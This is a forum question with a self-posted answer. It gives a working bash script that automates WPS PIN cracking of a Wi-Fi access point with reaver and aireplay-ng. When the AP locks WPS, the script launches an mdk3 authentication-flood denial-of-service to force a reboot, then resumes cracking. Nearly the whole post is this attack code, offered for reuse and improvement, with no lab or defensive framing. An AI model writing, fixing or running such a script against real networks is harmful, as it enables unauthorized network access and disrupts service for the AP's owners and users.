linuxbashcrackingaircrack-ngwps

Bash script for reaver to unlock wps-locked status

First of all, sorry for my poor poor english. I'm trying to write a bash script in order to perform AP WPS cracking using reaver. The problem is that after trying some WPS-PINs, the AP lock the WPS so I reaver is not usefull.

To solve this, I perform a mdk3 attack to force the AP to reboot and be able to attack it again (after reboot, the WPS restarts in unlocked state).

The problem with this approach is that:

  1. I have to be in front of the PC locking when the AP is locked and
  2. making an mdk3 attack, stop it when the AP is rebooted and performing again the reaver attack. The solution to this is obviously a script.

I wrote the following lines which should solve this.

I have to say that I'm a total noob in bash scripting, so the script is not "professional", it just a "workarround" to solve my problem.

#!/bin/bash

while true; do
    # Switch to the correct channel and save it into $channel
    echo Detecting AP channel
    timeout 25 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -q # Switch to the AP channel
    rm ap_channel 2> /dev/null
    touch ap_channel
    timeout 5 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
    channel="$(head -1 ap_channel | tail -c 2 | head -c 1)"
    rm ap_channel

    # Attacks the AP while it isn't wps-locked
    rm ap_status 2> /dev/null
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    while [ -z "$(grep Locked ap_status)" ]; do
        echo Performing reaver attack
        aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
        timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s REAVER_PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
        rm ap_status
        timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    done

    # The AP is now locked. Performs a mdk3 attack (in order to reboot the AP) while the AP wps-status is Locked
    ((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > /dev/null &
    mdk3_pid=$!
    rm ap_status
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    while [ -n "$(grep Locked ap_status)" ]; do
        echo Trying to reboot the AP
        rm ap_status
        timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    done

    # The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
    kill -9 $mdk3_pid
    echo AP rebooted. Waiting 2 mins till AP init
    sleep 120
done

The problem in this script is that the stdout redirection that I use for airodump output run different if I execute it directly in the command line than if I execute it inside the script.

timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status

I need a way to execute the line above within the script as if I execute it directly in the tty. I can't do this using exec because I need to continue with the script.

NOTE: I can't use the -w option for airodump-ng because it doesn't save the WPS status.

Could someone please help me with this?

Solution

  • I finally got it. I found a workaround to solve this problem, redirectirng the stdout of the commands to files. I post the script, maybe, someone could use it.

    !/bin/bash

    while true; do

rm attack
rm ap_status
rm ap_channel

# Detects the AP channel
echo Detecting AP channel
timeout 45 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -vv > ap_channel # Switch to the AP channel
timeout 15 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
channel="$(head -1 ap_channel | tail -c 3 | head -c 2)"
rm ap_channel
echo Detected AP channel $channel

# Attacks the AP using reaver till the AP locks the WPS
((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid

while [ -z "$(grep Locked ap_status)" ]; do
    echo Performing reaver attack
    aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
    timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
    ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 10
    kill -9 $airodump_pid
done

# Force a reboot in the AP to unlock WPS
((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > attack &
mdk3_pid=$!

((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid

while [ -n "$(grep Locked ap_status -m 1)" ]; do
    echo Trying to reboot the AP
    ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 10
    kill -9 $airodump_pid
done

# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
kill -9 $mdk3_pid
echo AP rebooted. Waiting 5 mins till AP init
rm attack
rm ap_status
sleep 300

done

    The delays are set to longs, but they are OK. That depends on the AP, you can change them.

    For using the script, aircrack, reaver (last version, the one which has the --wps option), timeout and mdk3 packages are needed.

    If someone who knows about bash scripting want to modify the script and upload a better one, that will be great!